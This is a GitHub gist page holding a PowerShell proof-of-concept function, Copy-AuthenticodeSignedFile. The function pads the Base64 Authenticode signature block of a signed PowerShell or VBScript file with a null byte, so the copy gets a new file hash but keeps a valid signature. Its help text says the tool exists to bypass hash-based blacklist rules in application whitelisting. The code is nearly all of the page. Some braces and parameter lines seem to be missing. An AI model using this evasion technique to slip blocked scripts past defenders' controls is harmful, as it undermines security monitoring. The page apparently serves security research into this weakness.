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Last active July 5, 2024 12:43
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  • Save mattifestation/640cee647ccb0e8375782a8b60acb716 to your computer and use it in GitHub Desktop.
Save mattifestation/640cee647ccb0e8375782a8b60acb716 to your computer and use it in GitHub Desktop.
When supplied with an Authenticode-signed PowerShell script, Copy-AuthenticodeSignedFile generates the same signed, validated file but with a different file hash.
function Copy-AuthenticodeSignedFile {
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Specifies the path to an Authenticode-signed PowerShell file.
.PARAMETER DestinationPath
Specifies the path the the new PowerShell file that will be created that preserves the Authenticode signature but has a different file hash.
Copy-AuthenticodeSignedFile -Path Blacklisted.ps1 -DestinationPath NoLongerBlacklisted.ps1
Get-Item Blacklisted.ps1 | Copy-AuthenticodeSignedFile -DestinationPath NoLongerBlacklisted.ps1
Accept file info from Get-ChildItem or Get-Item over the pipeline.
Outputs the result of Get-Authenticode signature on the new file.
param (
[Parameter(Mandatory, ValueFromPipelineByPropertyName)]
$FileInfo = Get-Item -Path $Path -ErrorAction Stop
$IsPowerShell = $False
$IsWSH = $False
# This could be extended to support any signable file format. This is just a PoC however.
switch ($FileInfo.Extension) {
'.ps1' { $IsPowerShell = $True }
'.psm1' { $IsPowerShell = $True }
'.psd1' { $IsPowerShell = $True }
'.vbs' { $IsWSH = $True }
default { throw "$Path is not a valid PowerShell or VBScript file." }
$SignerInfo = Get-AuthenticodeSignature -FilePath $Path -ErrorAction Stop
if ($IsPowerShell) {
if (-not (Get-Content -Path $Path | Select-String -SimpleMatch '# SIG # Begin signature block')) {
throw "$Path is not Authenticode signed. Copy-AuthenticodeSignedFile only works if the file has an embedded Authenticode signature."
$SignatureBlob = Get-Content $Path | Where-Object { (-not $_.StartsWith('# SIG')) -and ($_.StartsWith('# ')) }
$SignatureBlobRaw = ($SignatureBlob | Out-String).TrimEnd()
# Reassemble the Base64-encoded string
$EncodedSignature = ($SignatureBlob | ForEach-Object { $_.Substring(2) }) -join ''
# Decode the signature blob and append a null to it.
[Byte[]] $SignatureBytes = [Convert]::FromBase64String($EncodedSignature) + @([Byte] 0)
$NewEncodedSignatureBlob = [Convert]::ToBase64String($SignatureBytes) -split '(\S{64})' | Where-Object { $_ } | ForEach-Object { "# $_" } | Out-String
if ($IsWSH) {
if (-not (Get-Content -Path $Path | Select-String -SimpleMatch "'' SIG '' Begin signature block")) {
throw "$Path is not Authenticode signed. Copy-AuthenticodeSignedFile only works if the file has an embedded Authenticode signature."
$SignatureBlob = Get-Content $Path | Where-Object { (-not $_.StartsWith("'' SIG '' Begin")) -and (-not $_.StartsWith("'' SIG '' End")) -and ($_.StartsWith("'' SIG '' ")) }
$SignatureBlobRaw = ($SignatureBlob | Out-String).TrimEnd()
$EncodedSignature = ($SignatureBlob | ForEach-Object { $_.Substring(10) }) -join ''
# Decode the signature blob and append a null to it.
[Byte[]] $SignatureBytes = [Convert]::FromBase64String($EncodedSignature) + @([Byte] 0)
$NewEncodedSignatureBlob = [Convert]::ToBase64String($SignatureBytes) -split '(\S{44})' | Where-Object { $_ } | ForEach-Object { "'' SIG '' $_" } | Out-String
$FileContent = Get-Content $Path -Raw
$FileContent.Replace($SignatureBlobRaw, $NewEncodedSignatureBlob.TrimEnd()).TrimEnd() | Out-File -FilePath $DestinationPath
Get-AuthenticodeSignature -FilePath $DestinationPath
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